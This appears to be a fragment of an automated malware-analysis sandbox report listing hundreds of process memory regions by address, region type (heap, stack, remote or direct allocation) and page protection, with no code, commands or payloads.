heap
|
page read and write
|
||
|
2D0C000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
44C0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
50000
|
unkown
|
page readonly
|
||
|
8AE000
|
stack
|
page read and write
|
||
|
7AC0000
|
heap
|
page read and write
|
||
|
1FF1E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
946000
|
heap
|
page read and write
|
||
|
5E8000
|
unkown
|
page execute read
|
||
|
5A8E000
|
stack
|
page read and write
|
||
|
1660000
|
remote allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
468000
|
heap
|
page read and write
|
||
|
A0000
|
direct allocation
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A20E50000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
EA2000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8A4F000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page read and write
|
||
|
5210000
|
direct allocation
|
page read and write
|
||
|
16A21021000
|
trusted library allocation
|
page read and write
|
||
|
1180000
|
unkown
|
page readonly
|
||
|
308E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
20148000
|
heap
|
page read and write
|
||
|
16A21003000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
5EE000
|
unkown
|
page execute read
|
||
|
1FC5E000
|
stack
|
page read and write
|
||
|
2E0C000
|
stack
|
page read and write
|
||
|
6EAC1000
|
unkown
|
page execute read
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
1340000
|
unkown
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
1FDBE000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
16A211B1000
|
trusted library allocation
|
page read and write
|
||
|
60000
|
unkown
|
page readonly
|
||
|
3362000
|
trusted library allocation
|
page read and write
|
||
|
8D9000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
441A000
|
heap
|
page read and write
|
||
|
1F4E0000
|
direct allocation
|
page read and write
|
||
|
62B57FD000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
506E000
|
stack
|
page read and write
|
||
|
1370000
|
heap
|
page read and write
|
||
|
973000
|
heap
|
page read and write
|
||
|
F40000
|
heap
|
page read and write
|
||
|
7AC1000
|
heap
|
page read and write
|
||
|
7977000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1F8EE000
|
stack
|
page read and write
|
||
|
7AD2000
|
heap
|
page read and write
|
||
|
864D000
|
stack
|
page read and write
|
||
|
43E000
|
unkown
|
page readonly
|
||
|
3378000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
446E000
|
heap
|
page read and write
|
||
|
341F000
|
stack
|
page read and write
|
||
|
3042000
|
unkown
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
1F500000
|
direct allocation
|
page read and write
|
||
|
447B000
|
heap
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
3F40000
|
unkown
|
page execute and read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
4BB000
|
heap
|
page read and write
|
||
|
78E3000
|
heap
|
page read and write
|
||
|
946000
|
heap
|
page read and write
|
||
|
26CF000
|
stack
|
page read and write
|
||
|
942000
|
heap
|
page read and write
|
||
|
3333000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
4AC000
|
heap
|
page read and write
|
||
|
6437000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
9459000
|
direct allocation
|
page execute and read and write
|
||
|
16A21101000
|
trusted library allocation
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
43F8000
|
heap
|
page read and write
|
||
|
1FAED000
|
stack
|
page read and write
|
||
|
430000
|
unkown
|
page readonly
|
||
|
8750000
|
trusted library allocation
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
8A53000
|
heap
|
page read and write
|
||
|
6289000
|
trusted library allocation
|
page read and write
|
||
|
99A000
|
heap
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7900000
|
heap
|
page read and write
|
||
|
4456000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
4570000
|
direct allocation
|
page read and write
|
||
|
1F460000
|
direct allocation
|
page read and write
|
||
|
450000
|
unkown
|
page read and write
|
||
|
16A1F52F000
|
heap
|
page read and write
|
||
|
1201000
|
unkown
|
page readonly
|
||
|
1330000
|
unkown
|
page read and write
|
||
|
16A1F640000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
44BE000
|
heap
|
page read and write
|
||
|
1FF5F000
|
stack
|
page read and write
|
||
|
30B1000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
50000
|
unkown
|
page readonly
|
||
|
ECD000
|
stack
|
page read and write
|
||
|
3130000
|
direct allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
33C7000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
8E0000
|
heap
|
page read and write
|
||
|
5E6000
|
unkown
|
page execute read
|
||
|
4540000
|
direct allocation
|
page read and write
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
20430000
|
direct allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
8C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1170000
|
unkown
|
page readonly
|
||
|
305B000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
7855000
|
heap
|
page read and write
|
||
|
2027C000
|
heap
|
page read and write
|
||
|
25CE000
|
stack
|
page read and write
|
||
|
225DD000
|
unclassified section
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
410000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8DB000
|
heap
|
page read and write
|
||
|
447B000
|
heap
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
8C70000
|
trusted library allocation
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
410000
|
unkown
|
page readonly
|
||
|
1FDFF000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
85C0000
|
heap
|
page read and write
|
||
|
3FAD000
|
unkown
|
page execute and read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
430000
|
unkown
|
page readonly
|
||
|
248E000
|
stack
|
page read and write
|
||
|
20559000
|
direct allocation
|
page execute and read and write
|
||
|
1FA54000
|
system
|
page read and write
|
||
|
13DF000
|
heap
|
page read and write
|
||
|
44C0000
|
heap
|
page read and write
|
||
|
B75000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
EAB000
|
unkown
|
page read and write
|
||
|
8C40000
|
trusted library allocation
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
468000
|
heap
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
44BE000
|
heap
|
page read and write
|
||
|
1230000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
BC59000
|
direct allocation
|
page execute and read and write
|
||
|
7A5B000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
1FE4D000
|
stack
|
page read and write
|
||
|
C14000
|
heap
|
page read and write
|
||
|
420000
|
unkown
|
page readonly
|
||
|
96F000
|
heap
|
page read and write
|
||
|
7A65000
|
heap
|
page read and write
|
||
|
3509000
|
remote allocation
|
page execute and read and write
|
||
|
2F50000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
EA8000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2B50000
|
unkown
|
page execute and read and write
|
||
|
8EA000
|
heap
|
page read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
258F000
|
stack
|
page read and write
|
||
|
7ACE000
|
stack
|
page read and write
|
||
|
C20000
|
unkown
|
page readonly
|
||
|
203A5000
|
heap
|
page read and write
|
||
|
7C2B000
|
stack
|
page read and write
|
||
|
7AD3000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
15BE000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
914000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3300000
|
trusted library section
|
page read and write
|
||
|
1256000
|
heap
|
page read and write
|
||
|
D4F000
|
stack
|
page read and write
|
||
|
594F000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
38B000
|
stack
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
76DE000
|
stack
|
page read and write
|
||
|
4465000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
2041A000
|
heap
|
page read and write
|
||
|
427E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1370000
|
heap
|
page read and write
|
||
|
6F8000
|
stack
|
page read and write
|
||
|
1230000
|
unkown
|
page readonly
|
||
|
3CD6000
|
unclassified section
|
page read and write
|
||
|
446E000
|
heap
|
page read and write
|
||
|
ABE000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
1F870000
|
heap
|
page read and write
|
||
|
6EAC2000
|
unkown
|
page readonly
|
||
|
32CE000
|
direct allocation
|
page execute and read and write
|
||
|
16A1F53C000
|
heap
|
page read and write
|
||
|
15C0000
|
unkown
|
page readonly
|
||
|
3F09000
|
remote allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
21180000
|
unclassified section
|
page execute and read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
312C000
|
heap
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
E8D000
|
stack
|
page read and write
|
||
|
DA000
|
stack
|
page read and write
|
||
|
1FD60000
|
direct allocation
|
page read and write
|
||
|
5E4000
|
unkown
|
page execute read
|
||
|
1FAF0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
86F0000
|
trusted library allocation
|
page read and write
|
||
|
771E000
|
stack
|
page read and write
|
||
|
95E000
|
unkown
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
4DD000
|
stack
|
page read and write
|
||
|
2F8E000
|
stack
|
page read and write
|
||
|
5CCF000
|
stack
|
page read and write
|
||
|
1FFBC000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7AAA000
|
heap
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
103A000
|
stack
|
page read and write
|
||
|
42BE000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2DC6000
|
heap
|
page read and write
|
||
|
ACE000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A1F554000
|
heap
|
page read and write
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
205CE000
|
direct allocation
|
page execute and read and write
|
||
|
4A8000
|
heap
|
page read and write
|
||
|
933000
|
heap
|
page read and write
|
||
|
1210000
|
unkown
|
page read and write
|
||
|
4230000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
452F000
|
stack
|
page read and write
|
||
|
70000
|
unkown
|
page readonly
|
||
|
333D000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
B72000
|
heap
|
page read and write
|
||
|
430000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
868F000
|
stack
|
page read and write
|
||
|
1190000
|
unkown
|
page readonly
|
||
|
BB0000
|
unkown
|
page read and write
|
||
|
446E000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
3138000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
DB0000
|
unkown
|
page readonly
|
||
|
74B0000
|
heap
|
page read and write
|
||
|
DA000
|
stack
|
page read and write
|
||
|
2150000
|
unkown
|
page execute and read and write
|
||
|
EAE000
|
unkown
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
31CE000
|
stack
|
page read and write
|
||
|
7AD8000
|
heap
|
page read and write
|
||
|
3340000
|
trusted library allocation
|
page read and write
|
||
|
16A2100F000
|
trusted library allocation
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
8700000
|
heap
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
937000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
927000
|
heap
|
page read and write
|
||
|
16A20F00000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
93B0000
|
direct allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2F44000
|
heap
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
5220000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7AB4000
|
heap
|
page read and write
|
||
|
1FF60000
|
heap
|
page read and write
|
||
|
1F4C0000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
CFE000
|
unkown
|
page read and write
|
||
|
11F0000
|
unkown
|
page read and write
|
||
|
7A68000
|
heap
|
page read and write
|
||
|
6430000
|
trusted library allocation
|
page read and write
|
||
|
1FEE0000
|
remote allocation
|
page read and write
|
||
|
450000
|
unkown
|
page read and write
|
||
|
89A0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
94B000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7ACA000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7A51000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
200C1000
|
heap
|
page read and write
|
||
|
1380000
|
unkown
|
page read and write
|
||
|
1FAF9000
|
heap
|
page read and write
|
||
|
985000
|
heap
|
page read and write
|
||
|
7A8E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
BCE000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
890C000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page read and write
|
||
|
802C000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A1F520000
|
heap
|
page read and write
|
||
|
3365000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3482000
|
unclassified section
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5B0000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8A5B000
|
heap
|
page read and write
|
||
|
4550000
|
direct allocation
|
page read and write
|
||
|
965000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
113D000
|
stack
|
page read and write
|
||
|
42D7000
|
heap
|
page read and write
|
||
|
33FD000
|
direct allocation
|
page execute and read and write
|
||
|
2DDB000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2DD8000
|
system
|
page execute and read and write
|
||
|
20701000
|
direct allocation
|
page execute and read and write
|
||
|
16A2100A000
|
trusted library allocation
|
page read and write
|
||
|
1950000
|
unkown
|
page readonly
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
20780000
|
unclassified section
|
page execute and read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
4465000
|
heap
|
page read and write
|
||
|
502E000
|
stack
|
page read and write
|
||
|
7C7E000
|
stack
|
page read and write
|
||
|
5778000
|
trusted library allocation
|
page read and write
|
||
|
3126000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2109000
|
remote allocation
|
page execute and read and write
|
||
|
B259000
|
direct allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
13C8000
|
heap
|
page read and write
|
||
|
200C7000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2DE1000
|
system
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
16A20E50000
|
trusted library allocation
|
page read and write
|
||
|
C4D000
|
stack
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3390000
|
heap
|
page readonly
|
||
|
730000
|
heap
|
page read and write
|
||
|
3259000
|
direct allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2EFE000
|
heap
|
page read and write
|
||
|
44BF000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
5200000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
52E2000
|
trusted library allocation
|
page read and write
|
||
|
1380000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
200BC000
|
stack
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A211BE000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
816E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A21012000
|
trusted library allocation
|
page read and write
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
942000
|
heap
|
page read and write
|
||
|
60000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8D9000
|
heap
|
page read and write
|
||
|
8E9000
|
heap
|
page read and write
|
||
|
335A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A8C000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
6EAC0000
|
unkown
|
page readonly
|
||
|
3896000
|
unkown
|
page read and write
|
||
|
8A34000
|
heap
|
page read and write
|
||
|
359C000
|
unclassified section
|
page read and write
|
||
|
86E0000
|
trusted library allocation
|
page read and write
|
||
|
62B67FF000
|
stack
|
page read and write
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
16A1F475000
|
system
|
page execute and read and write
|
||
|
1950000
|
unkown
|
page readonly
|
||
|
103A000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5BCE000
|
stack
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
43F0000
|
heap
|
page read and write
|
||
|
70000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5270000
|
heap
|
page execute and read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
5A4F000
|
stack
|
page read and write
|
There are 902 hidden memdumps, click here to show them.